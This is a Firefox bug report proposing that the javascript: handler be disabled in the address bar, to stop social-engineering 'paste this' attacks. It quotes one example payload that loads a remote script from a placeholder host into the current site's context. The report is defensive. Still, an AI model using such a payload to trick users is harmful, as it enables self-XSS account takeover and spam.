654625 - Consider disabling javascript protocol handler in location bar by default

Status: RESOLVED DUPLICATE of bug 656433

(Firefox :: Security, enhancement)

Description

[u414554]

User-Agent:       Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Build Identifier: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0

An increasingly common attack is to ask the user to paste something like this into their location bar:

   javascript:(a=(b=document).createElement('script')).src='//example.com/dodgy.js',b.body.appendChild(a);void(0)

which would execute the script http://example.com/dodgy.js in the user's browser and in the security context of the current website. For example, this technique is currently doing the rounds via Facebook where the target script attempts to compromise the user's privacy and spam their contacts.

To prevent such manual cross-site scripting attacks, and because for the vast majority of users the javascript URL is not useful, I think that the javascript protocol handler should be disabled in the address bar by default. (Only in the address bar though, as of course this protocol handler is required in anchor tags and suchlike.)

The majority of users have no use for entering such URLs there, but as web developers and other power users would object to this restriction as they have a genuine use for this (and are most likely to be able to spot malicious script), I think also it should be a configurable option somewhere in the Options, perhaps in Advanced or Security.

Reproducible: Always